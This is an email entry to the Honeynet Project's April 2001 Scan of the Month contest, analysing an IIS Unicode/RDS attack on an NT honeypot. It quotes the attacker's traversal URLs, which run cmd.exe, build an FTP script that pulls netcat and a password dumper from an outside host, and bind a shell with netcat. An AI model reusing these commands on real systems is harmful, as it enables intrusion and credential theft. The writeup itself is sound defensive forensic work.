From fbsi@gamewood.net Fri Apr 20 20:28:50 2001 Date: Tue, 03 Apr 2001 10:20:08 -0400 From: "John K. Riggleman, Jr." To: project@honeynet.org Subject: Entry for April 2001 Scan #14 Here is a document reguarding this month's scan. Thanks again for providing the contest and giving me something to do. [ Part 2: "Attached Text" ] ******************************** * Scan 14 Analysis - NT Attack * ******************************** ************************* * Analysis and Document * *-----------------------* * John K. Riggleman Jr. * ************* ************************* * Questions * ********* ********************************************************************* * 1.Which exploit(s) were used to attack the system? * * 2.How were the exploits used to access and control the system? * * 3.What was done once access was gained? * * 4.How could this attack been prevented? * * 5.How much time did you spend on this analysis and writeup? * * * * Bonus Question: * * Do you feel that the attacker in question knew if this was a honeypot?* * If so, why or why not? * ************************************************************************* ************ * Tools * ******** ********************************************** * EDIT.COM # Initial analyzing * * WRITE.EXE # Analyzing * * NOTEPAD.EXE # Writing this document * * (Best if viewed in notepad. 800x600 maximized) * ************************************************** ******************************************************* * 1) Which exploit(s) were used to attack the system? * ******************************************************* RDS & Unicode IIS-based attacks were used. RDS/IIS 4.0 Vulnerability and Script || By rain forest puppy / ADM / Wiretrip. ------http://security-archive.merton.ox.ac.uk/bugtraq-199907/0178.html Description of Unicode-based exploit which was used in this attack. ------http://packetstorm.securify.com/0010-exploits/iis-unicode.txt ******************************************************************* * 2) How were the exploits used to access and control the system? * ******************************************************************* The successful Unicode attacks were used to install netcat, a tool that can be used to "bind" a file's input/output to a port (similar to some shellcode used on Linux and also the shellcode supplied with the IIS4 HTR bufferoverflow). ---- Step-by-Step analysis of Unicode attacks ---- GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1 This URL request executes C"\WINNT\System32\cmd.exe /c copy C:\winnt\system32\cmd.exe cmd1.exe, which basically is creating a copy of the command interpretter to the current directory. (C:\Program Files\Common Files\system\msadc\). (For ease of reading, "~" will be substituted for the "GET" + current working directory. Example: "GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc /cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1" "~/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1") ~/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+johna2k+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+haxedj00+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+get+nc.exe+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+get+pdump.exe+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1 These commands use "echo" to create a file called "ftpcom" in the current working directory. This file is to be used as a script file for FTP.exe, a console-based FTP client included with Windows. This file contains (comments to the following are my descriptions): ------------ open 213.116.251.162 # Open an FTP connection to 213.116.251.162 johna2k # Login Name haxedj00 # Password get nc.exe # Download Netcat get pdump.exe # Download a password dumper *[1]* get samdump.dll # Download DLL required for password dumper quit # Exit the FTP program/Disconnect from the remote system *[1]* - Most likely similar to the dumper found at: -----http://www.webspan.net/~tas/pwdump2/ ------------ ~/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1 This command runs FTP.exe with the "-s:ftpcom" command-line, specifying "ftpcom" as a script. ~/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1 This executes netcat with the following parameters: ---- -l # listens for an incoming connection -p 6969 # specifies the port (6969) for netcat to listen on -e cmd1.exe # specifies the command to execute and "pipe" the input/output for ---- With this command, telnetting to port 6969 of the attacked machine provides a console prompt capable of creating/modifying directories and files. ******************************************** * 3) What was done once access was gained? * ******************************************** Apparently, the intruder is more "at-home" in a Linux/*nix-based environment. Things such as using "cat" instead of "type", "cd /winnt" instead of "cd \winnt", and "ls" instead of "dir" are several instances where this was clearly noticeable. The intruder created several text files *[2]* and tried to access some of them remotely from a web browser. A file "test.txt" in the wwwroot directory was accessible remotely. The person also tried using "net", apparently to get more information on the compromised system's local network. The user also tried to pipe the output to a file, perhaps in hopes that it would work (but the attacker did not have permissions which would allow this). The user browsed through the system quite a bit, finding exploit sourcecode and other such files. On attempting to use the "pdump" utility, "Failed to open lsass: 5. Exiting." was returned. Once again, the intruder just doesn't have the permissions to do such. ~/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+johna2k+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+haxedj00+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+put+c:\wiretrip\whisker.tar.gz+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1 ~/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1 The "ftpcom" file is overwritten and a script to upload "c:\wiretrip\whisker.tar.gz" onto the FTP server is created and executed. This could have been done from the prompt, but was done through the Unicode URLs instead. *shrug* *[2]* - The contents of these text files are described in the Bonus Question. ******************************************* * 4) How could this attack been prevented?* ******************************************* The Unicode bug can be corrected by patching. ------http://www.microsoft.com/technet/security/bulletin/fq00-078.asp Also, if the admin uses a different FTP client, the console-based FTP.exe could be removed. **************************************************************** * 5) How much time did you spend on this analysis and writeup? * **************************************************************** Initial reading of entire logs - ~1.5 hour Data Collection + Typing + Proofreading - ~2.5 hours ---------------------------------------------------------- Estimated 4 hours ******************* * Bonus Question: ************************************************************************ ***************** Do you feel that the attacker in question knew if this was a honeypot? * * If so, why or why not? ************************************************* ************************** The attacker was aware that the system was a honeypot based on two of the text files that were created. They were: ____ C:\README.NOW.Hax0r ____ Hi, i know that this is a lab server, but patch the holes! :-) ____ C:\rfp.txt____ best honeypot i've seen till now :) --------------------------------------------------------------------------------------------- /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ --------------------------------------------------------------------------------------------- |||||||||||||||||| April 03, 2001 || 10:17 AM EST || John K. Riggleman Jr. |||||||||||||||||| --------------------------------------------------------------------------------------------- \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ ---------------------------------------------------------------------------------------------